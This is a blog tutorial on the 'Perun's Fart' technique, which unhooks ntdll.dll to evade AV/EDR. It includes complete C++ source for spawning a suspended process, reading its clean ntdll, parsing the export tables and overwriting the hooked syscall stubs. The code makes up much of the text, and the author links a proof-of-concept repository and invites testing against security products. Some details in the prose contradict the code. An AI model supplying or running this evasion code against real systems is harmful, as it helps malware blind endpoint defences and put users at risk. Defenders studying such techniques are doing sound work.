API Unhooking with Perun's Fart

Pre-requisites

To fully understand this topic, one needs to have some knowledge about the following concepts:

Little bit of C++ programming
Some knowledge of API hooking by AV/EDR software
Basic understanding of the PE structures
Basic knowledge about Win32 APIs and their workings

Introduction

Recently, while going through some malware evasion techniques, I came across a very new and uncommon technique, called Perun’s Fart in a Blog by Sektor7. This is a novel technique, which primarily focuses on retrieving a fresh unhooked copy of the ntdll.dll.

This is done by creating a process in a suspended state. Now, this suspended process will not have any functions hooked by the EDR. According to the original blog, this takes advantage of the fact that, there is a gap between new process being spawned and the AV/EDR injecting their custom DLL. We will dive into this topic later on.

So, we copy the syscall stubs from the fresh ntdll.dll into our current process. Thus, giving us an unhooked version.

Overview of the technique

First we need to create a process in a suspended state
Then we need to find the base address of the ntdll.dll of our current process
Since the created process is a child process of our current process, the base address of ntdll.dll will be same
Therefore, we read the complete ntdll.dll from the suspended process
Then we parse the Export Directory of both the fresh ntdll.dll and that of our current process
We look for Nt APIs and extract the syscall stubs from fresh ntdll.dll and copy them to the ntdll of our current process
Then we can terminate the suspended process and continue with our malicious code. (Although, in this POC I have not used and injection code.)

Implementing the first part of the code

For this I will be using C++ as my language of choice. This is because, I find it easier to work with some in-built structures and some APIs. I will try to break down the technique into smaller parts and get into each detail. I have tried to add my own improvements on top of the C# code by packyhacker, which I believe is more authentic to the Windows Evasion Course by Sektor7

Refer to my original POC : https://github.com/dosxuz/PerunsFart

Why suspended process?

To get a fresh copy of ntdll we need to create a suspended process as already stated. We need to read that ntdll.dll from the suspended process. But why is the ntdll in the suspended process not hooked? I got this answer to some extent from this StackOverflow thread.

According to this thread, only ntdll.dll is initially mapped, and an APC is queued to run when the thread resumes. This calls ntdll!LdrpInitializeProcess, which initializes the execution environment (e.g. language support, the heap, thread-local storage, the KnownDlls directory), loads kernel32.dll and gets the address of BaseThreadInitThunk, does static DLL imports, breaks for an attached debugger, and runs the init routines. Then execution jumps to ntdll!RtlUserThreadStart, which calls kernel32!BaseThreadInitThunk, which calls the EXE’s entry point such as WinMainCRTStartup

Therefore, we can understand that when the process is started, first the ntdll.dll is only mapped. For this reason, if you attach to a suspended process using x64Dbg, you’ll find that only the ntdll.dll is there in the modules list.

Now, since the process is in a suspended state, the APC which is queued is also not run. This in turn will not call LdrpInitializeProcess, as a result the rest of the modules are not loaded.

As we can see in the above picture, only the ntdll.dll and the program itself is loaded.

NOTE: If you’re using a debugger like WinDbg, it will force the loading of other modules, as soon as you attach to the process

Reading fresh ntdll

Now, that we know why we need a suspended process to get a fresh copy of the ntdll, we need to implement it.

First we need to create a process in a suspended state using CreateProcessA API. We can do that as follows
The following code is inside the main() function

STARTUPINFOA* si = new STARTUPINFOA();
PROCESS_INFORMATION* pi = new PROCESS_INFORMATION();
//BOOL stat = CreateProcessA_p(nullptr, (LPSTR)"C:\\Windows\\System32\\svchost.exe", nullptr, nullptr, FALSE, CREATE_SUSPENDED, nullptr, nullptr, si, pi);
BOOL stat = CreateProcessA_p(nullptr, (LPSTR)"cmd.exe", nullptr, nullptr, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, nullptr, "C:\\Windows\\System32\\", si, pi);

HANDLE hProcess = pi->hProcess;
printf("PID : %d\n", pi->dwProcessId);

Finding the base address of ntdll.dll by traversing through the loaded modules in the process
For this, we use a custom function by paranoidninja. Here it is named as GetDll()

WCHAR findname[] = L"ntdll.dll\x00";
PVOID ntdllBase = GetDll(findname);
printf("ntdll.dll base address : 0x%p\n", ntdllBase);

We pass the name of the DLL whose base address we want to locate (in this case the ntdll.dll), and the function returns its base address.
The following is the code of GetDll() function

PVOID GetDll(PWSTR FindName)
{
	_PPEB ppeb = (_PPEB)__readgsqword(0x60);
	ULONG_PTR pLdr = (ULONG_PTR)ppeb->pLdr;
	ULONG_PTR val1 = (ULONG_PTR)((PPEB_LDR_DATA)pLdr)->InMemoryOrderModuleList.Flink;
	PVOID dllBase = nullptr;

	ULONG_PTR val2;
	while (val1)
	{
		PWSTR DllName = ((PLDR_DATA_TABLE_ENTRY)val1)->BaseDllName.pBuffer;
		dllBase = (PVOID)((PLDR_DATA_TABLE_ENTRY)val1)->DllBase;
		if (wcscmp(FindName, DllName) == 0)
		{
			break;
		}
		val1 = DEREF_64(val1);
	}
	return dllBase;
}

The above function, uses the intrinsic __readgsqword() to read 0x60 bytes from the gs register. This will give us the pointer to the PEB (Process Environment Block)
From the PEB structure, we find the address of the Loader data or Ldr

Then we traverse through the loaded modules using the Ldr in order to get our required base of the ntdll

Extracting Loaded Modules through the Loader Data

Before we move further, we need to understand the concept of how different modules are accessed and loaded in a process. For this, we will take help of WinDbg.

The Process Environment Block (PEB) has a Ldr structure at offset 0x018 . We can view the structure of PEB using dt nt!_PEB

This Ldr is of type PEB_LDR_DATA. We can get the address of Ldr by using the command !peb

Now if we view the data at address 0x00007ffb38f1a4c0 as type PEB_LDR_DATA, we find the following

We see that there are 3 doubly linked lists InLoadOrderModuleList, InMemoryOrderModuleList and InLoadOrderModuleList. These are of type LIST_ENTRY which have nested structure of type LDR_DATA_TABLE_ENTRY
Therefore, we can typecast these structures as LDR_DATA_TABLE_ENTRY

dt nt!_LDR_DATA_TABLE_ENTRY 0x000002d2`270d2ef0

Here we take the starting address of the structure InLoadOrderModuleList for the example.
Once, we typecast it into LDR_DATA_TABLE_ENTRY, we will have the starting address of the next link.

We see that the first loaded module is the program itself cmd.exe
Now, we have the starting address of the next link 0x000002d2270d2d20, which we can use to typecast

dt nt!_LDR_DATA_TABLE_ENTRY 0x000002d2`270d2d20

We find that the next loaded module is ntdll.dll
Along with the name, we also get the base address.

This technique essentially reduces our dependency on the API GetModuleHandle, which in some cases might be hooked or blacklisted.

Reading the entire ntdll with NtReadVirtualMemory

Now that we have the base address of the fresh ntdll, we need to read it. Since, the suspended process that we have created, is a child process of our current process, the base address of the ntdll will be the same. Therefore, we can use this same address to read from the suspended process.

Before reading from the suspended process, we need to know how many bytes we have to read.
We can get this from the SizeOfImage entry from the OptionalHeader structure.
We can parse the optional header as follows:

PIMAGE_DOS_HEADER ImgDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
PIMAGE_NT_HEADERS ImgNTHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + (ImgDosHeader->e_lfanew));
IMAGE_OPTIONAL_HEADER OptHeader = (IMAGE_OPTIONAL_HEADER)ImgNTHeaders->OptionalHeader;
PIMAGE_SECTION_HEADER textsection = IMAGE_FIRST_SECTION(ImgNTHeaders);

DWORD ntdllSize = OptHeader.SizeOfImage;

First we typecast the base of ntdll to DOS Header structure
Next, we add the value of e_lfanew with the base of the image, in order to get the NT Headers
Once we have the NT Headers we can obtain the Optional Header from it
We also need to extract the .text section from NT Headers using the macro IMAGE_FIRST_SECTION(). This will be used later on.
Now that we have the size of ntdll image, we need to allocate memory of the same size using VirtualAlloc

LPVOID freshNtdll = VirtualAlloc(NULL, ntdllSize, MEM_COMMIT, PAGE_READWRITE);

Then we use NtReadVirtualMemory to read that same number of bytes from the suspended process, with the ntdll base address

DWORD bytesread = NULL;
printf("Fresh NTDLL : 0x%p\n", freshNtdll);
NtReadVirtualMemory_p(hProcess, ntdllBase, freshNtdll, ntdllSize, &bytesread);

Now we will have the fresh ntdll in the address freshNtdll

Unhooking the current ntdll

We now need to extract the syscall stubs of the Nt functions from the fresh ntdll and overwrite on the Nt functions of the hooked ntdll.

This whole things is done through the DoShit() function

DoShit(ntdllBase, freshNtdll, textsection);

It takes the parameters ntdllBase (the hooked ntdll), freshNtdll(the unhooked version from current process), textsection (the text section of the current ntdll)

Getting the Export Directory

The DoShit() function looks as follows

void DoShit(PVOID ntdllBase, PVOID freshntDllBase, PIMAGE_SECTION_HEADER textsection)
{
	PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;

	if (!GetImageExportDirectory(freshntDllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
		printf("Error\n");

	PIMAGE_EXPORT_DIRECTORY hooked_pImageExportDirectory = NULL;
	if (!GetImageExportDirectory(ntdllBase, &hooked_pImageExportDirectory) || hooked_pImageExportDirectory == NULL)
		printf("Error\n");

	OverwriteNtdll(ntdllBase, freshntDllBase, hooked_pImageExportDirectory, pImageExportDirectory, textsection);
}

The first function that we need to use is GetImageExportDirectory()
It takes the base address of ntdll (it takes both the hooked and unhooked versions in two different calls)
First we get the Export Directory of the fresh ntdll and then the Export Directory of the hooked ntdll
The GetImageExportDirectory works as follows :

BOOL GetImageExportDirectory(PVOID ntdllBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory)
{
	//Get DOS header
	PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
	if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
		return FALSE;
	}

	PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)ntdllBase + pImageDosHeader->e_lfanew);
	if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
		return FALSE;
	}
	// Get the EAT
	*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)ntdllBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
	return TRUE;
}

It first gets the pointer to the DOS Header from the image base
Then it gets the pointer to the NT Headers by adding the value of e_lfanew to the image base
From the Optional Header it takes the array DataDirectory and adds the virtual address of the entry at offset 0
This is because the entry at offset 0 is that of the Export Directory. We can confirm this from CFF Explorer

Therefore, we have the pointer to the export tables of both the hooked and unhooked versions of ntdll

Extracting addresses of Nt APIs

After getting the Export Directories of both the versions of DLLs, we call the OverwriteNtdll function
It takes the Export Directories of both the versions of ntdll

void OverwriteNtdll(PVOID ntdllBase, PVOID freshntDllBase, PIMAGE_EXPORT_DIRECTORY hooked_pImageExportDirectory, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PIMAGE_SECTION_HEADER textsection)
{
	PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfFunctions);
	PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfNames);
	PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfNameOrdinals);

	for (WORD cx = 0; cx < hooked_pImageExportDirectory->NumberOfNames; cx++) {
		PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
		PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];

		if (strstr(pczFunctionName, (CHAR*)"Nt") != NULL)
		{
			PVOID funcAddress = GetTableEntry(freshntDllBase, pImageExportDirectory, pczFunctionName);
			if (funcAddress != 0x00 && std::strcmp((CHAR*)"NtAccessCheck", pczFunctionName) != 0)
			{
				printf("Function Name : %s\n", pczFunctionName);
				printf("Address of Function in fresh ntdll : 0x%p\n", funcAddress);
				//Change the write permissions of the .text section of the ntdll in memory
				DWORD oldprotect = ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), PAGE_EXECUTE_READWRITE, textsection->Misc.VirtualSize);
				//Copy the syscall stub from the fresh ntdll.dll to the hooked ntdll
				std::memcpy((LPVOID)pFunctionAddress, (LPVOID)funcAddress, 23);
				//Change back to the old permissions
				ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), oldprotect, textsection->Misc.VirtualSize);
			}
		}
	}
	printf("Completed Overwriting ntdll.dll\n");
	getchar();
}

This function in turn calls the GetTableEntry() function (Taken from HellsGate by am0nsec, which takes the base address of the ntdll and the Export Directory of that same version of the ntdll, as well as the name of the function, whose address we want to extract.

PVOID GetTableEntry(PVOID ntdllBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, CHAR* findfunction)
{
	PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfFunctions);
	PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfNames);
	PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfNameOrdinals);
	PVOID funcAddress = 0x00;
	for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
		PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
		PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];

		if (std::strcmp(findfunction, pczFunctionName) == 0)
		{
			WORD cw = 0;
			while (TRUE)
			{
				if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
				{
					return 0x00;
				}

				// check if ret, in this case we are also probaly too far
				if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
				{
					return 0x00;
				}

				if (*((PBYTE)pFunctionAddress + cw) == 0x4c
					&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
					&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
					&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
					&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
					&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
					BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
					BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
					WORD syscall = (high << 8) | low;
					//printf("Function Name : %s", pczFunctionName);
					//printf("Syscall : 0x%x", syscall);
					return pFunctionAddress;
					break;
				}
				cw++;
			}
		}
	}
	return funcAddress;
}

Although I have modified it to suite our current requirements, but the core concept remains the same
This function first initializes the variables for storing the address of the functions, the address of the function names, and the address of Name Ordinals

PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfFunctions);
PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfNames);
PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)ntdllBase + pImageExportDirectory->AddressOfNameOrdinals);

It initializes the function address as 0x0

PVOID funcAddress = 0x00;

It then iterates through all the function names in the Export Directory by using the ImageExportDirectory->NumberOfNames as the upper limit

for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
	PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
	PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];

	if (std::strcmp(findfunction, pczFunctionName) == 0)
	{
		WORD cw = 0;
		while (TRUE)
		{
			if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
			{
				return 0x00;
			}

			// check if ret, in this case we are also probaly too far
			if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
			{
				return 0x00;
			}

			if (*((PBYTE)pFunctionAddress + cw) == 0x4c
				&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
				&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
				&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
				&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
				&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
				BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
				BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
				WORD syscall = (high << 8) | low;
				//printf("Function Name : %s", pczFunctionName);
				//printf("Syscall : 0x%x", syscall);
				return pFunctionAddress;
				break;
			}
			cw++;
		}
	}
}

The outer for loop first calculates, the address of the function name (converts it to char pointer), and the address of the function

PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];

As soon as it finds the function name that we are looking for, it goes inside a second while loop

if (std::strcmp(findfunction, pczFunctionName) == 0)
{
	WORD cw = 0;
	while (TRUE)
	{

Then we have the following code inside the while loop

if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
{
	return 0x00;
}

// check if ret, in this case we are also probaly too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
{
	return 0x00;
}

if (*((PBYTE)pFunctionAddress + cw) == 0x4c
	&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
	&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
	&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
	&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
	&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
	BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
	BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
	WORD syscall = (high << 8) | low;
	//printf("Function Name : %s", pczFunctionName);
	//printf("Syscall : 0x%x", syscall);
	return pFunctionAddress;
	break;
}
cw++;

In this code, the variable cw of type WORD is used to point to various bytes, starting from the function address
The first if statement checks whether the first two bytes are 0x0f and 0x05 or not. In this case we have the opcodes for the syscall.

if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
{
	return 0x00;
}

The next if statement check whether the current byte is 0xc3 or not. In this case we have reached the ret instruction.

// check if ret, in this case we are also probaly too far
if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
{
	return 0x00;
}

In both the cases, it will be treated as an error and will return with the function address as 0x0
But in the third if statement, it finds that the first 4 bytes are 0x4c, 0x8d, 0xd1, 0xb8, and the bytes at 7th and 8th positions are 0x0. This means that we are exactly at the syscall stub.

if (*((PBYTE)pFunctionAddress + cw) == 0x4c
	&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
	&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
	&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
	&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
	&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
	BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
	BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
	WORD syscall = (high << 8) | low;
	//printf("Function Name : %s", pczFunctionName);
	//printf("Syscall : 0x%x", syscall);
	return pFunctionAddress;
	break;
}

From here we can either successfully extract the syscall (for some other techniques like Hell’s Gate) or we can return the address of the function. This was important to make sure that we landed on the extract entry point of a Nt function.

Understanding the OverwriteNtdll function

Now that we know how the GetTableEntry function works, we can start with the OverwriteNtdll function.

void OverwriteNtdll(PVOID ntdllBase, PVOID freshntDllBase, PIMAGE_EXPORT_DIRECTORY hooked_pImageExportDirectory, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PIMAGE_SECTION_HEADER textsection)
{
	PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfFunctions);
	PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfNames);
	PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)ntdllBase + hooked_pImageExportDirectory->AddressOfNameOrdinals);

	for (WORD cx = 0; cx < hooked_pImageExportDirectory->NumberOfNames; cx++) {
		PCHAR pczFunctionName = (PCHAR)((PBYTE)ntdllBase + pdwAddressOfNames[cx]);
		PVOID pFunctionAddress = (PBYTE)ntdllBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];

		if (strstr(pczFunctionName, (CHAR*)"Nt") != NULL)
		{
			PVOID funcAddress = GetTableEntry(freshntDllBase, pImageExportDirectory, pczFunctionName);
			if (funcAddress != 0x00 && std::strcmp((CHAR*)"NtAccessCheck", pczFunctionName) != 0)
			{
				printf("Function Name : %s\n", pczFunctionName);
				printf("Address of Function in fresh ntdll : 0x%p\n", funcAddress);
				//Change the write permissions of the .text section of the ntdll in memory
				DWORD oldprotect = ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), PAGE_EXECUTE_READWRITE, textsection->Misc.VirtualSize);
				//Copy the syscall stub from the fresh ntdll.dll to the hooked ntdll
				std::memcpy((LPVOID)pFunctionAddress, (LPVOID)funcAddress, 23);
				//Change back to the old permissions
				ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), oldprotect, textsection->Misc.VirtualSize);
			}
		}
	}
	printf("Completed Overwriting ntdll.dll\n");
	getchar();
}

This function works in a similar fashion as that of GetTableEntry but instead of check for the syscall stub, it checks if the function is a Nt function or not.

if (strstr(pczFunctionName, (CHAR*)"Nt") != NULL)
{
	PVOID funcAddress = GetTableEntry(freshntDllBase, pImageExportDirectory, pczFunctionName);
	if (funcAddress != 0x00)
	{
		printf("Function Name : %s\n", pczFunctionName);
		printf("Address of Function in fresh ntdll : 0x%p\n", funcAddress);
		//Change the write permissions of the .text section of the ntdll in memory
		DWORD oldprotect = ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), PAGE_EXECUTE_WRITECOPY, textsection->Misc.VirtualSize);
		//Copy the syscall stub from the fresh ntdll.dll to the hooked ntdll
		std::memcpy((LPVOID)pFunctionAddress, (LPVOID)funcAddress, 23);
		//Change back to the old permissions
		ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), oldprotect, textsection->Misc.VirtualSize);
	}
}

If it is a Nt function, then it extracts the function address of that same function from the fresh ntdll
Then it checks if there has been any error, by check if the funcAddress is 0x00 or not
Before we can overwrite the hooked API, with the correct bytes, we need to change the access permissions of that memory region. Here I am using PAGE_EXECUTE_WRITECOPY, which is the bare minimum permission that we need

DWORD oldprotect = ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), PAGE_EXECUTE_WRITECOPY, textsection->Misc.VirtualSize);

The ChangePerms() function works as follows:

DWORD ChangePerms(PVOID textBase, DWORD flProtect, SIZE_T size)
{
	DWORD oldprotect;
	VirtualProtect(textBase, size, flProtect, &oldprotect);
	return oldprotect;
}

After changing the permissions of the memory region for writing we use memcpy to write 23 bytes to that memory region.
The size of the complete syscall stub is 23 bytes

std::memcpy((LPVOID)pFunctionAddress, (LPVOID)funcAddress, 23);

Once we have overwritten with the clean bytes, we can now change the permissions back to its original

ChangePerms((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)textsection->VirtualAddress), oldprotect, textsection->Misc.VirtualSize);

Tying up loose ends

Once our purpose of unhooking the ntdll is completed, we can now finally terminate the suspended process using the TerminateProcess API

TerminateProcess(hProcess, 0);

Testing the POC

Now that we have completely understood the working of our POC, we can test it against any AV/EDR. The POC does not have any injection code which can lead to code execution. This is because, it will help us to understand the code fully without straying further away from the nuances of the actual technique. Also, it takes a lot more work to get an agent callback against the EDR that I was testing my code against. This POC just focuses on the unhooking aspect of the technique.

In order to test the POC, we need our program to wait for a user input before unhooking. During this time, we can attach a debugger to it

Here we can see that our program is waiting for user input. Now attach x64Dbg to it

We can see both the suspended process and the parent process
We attach debugger to the parent process

Search for the NtCreateThread API from the ntdll.dll module
This is because, most AV/EDRs don’t hook each and every function, in order to reduce the amount computation power needed as well as to reduce false positives.

Checking the function, we see that there is a jmp statement for this function, instead of the syscall stub. However, this is not the case with the next function.
This is because, NtCreateThread is widely used by malwares.
Now we continue with the execution of our program by pressing enter

We see that it has successfully executed
Now lets check on the NtCreateThread API

We see that there is now a normal syscall stub instead of the jmp statement as we had seen previously.
This shows that we have successfully unhooked the ntdll.dll of the current process using a novel technique

Conclusion

This technique, is indeed a very interesting and fun way to unhook ntdll. It takes into consideration the basic fact that when a process is created, at first only the ntdll.dll is loaded and then the other modules and takes advantage of it at very well.

However, while writing this code, and giving my own additions into it at the same time, I felt that technique is becoming unnecessarily complex. There can be other ways to make it simpler and better, but it all comes down to the fact, that there are still so many better evasion techniques than this. Also, to over the hooked ntdll you need to change the permissions of the memory region to PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY, which can be easily flagged by most AV/EDR softwares.

While working on this POC, I learned a lot about how modules are loaded in processes and how you can navigate through the Export Table. That’s what makes it a great learning experience for me, and I’d love to take the courses offered by Sektor7. Even with the simple blog, they have inspired me to hop into the rabbit hole and emerge as a more knowledgeable hacker.

All credits for the original concept and theory goes to Sektor7.

My POC code at : https://github.com/dosxuz/PerunsFart

References

2022-05-14

https://dosxuz.gitlab.io/post/perunsfart/ Ritaban Das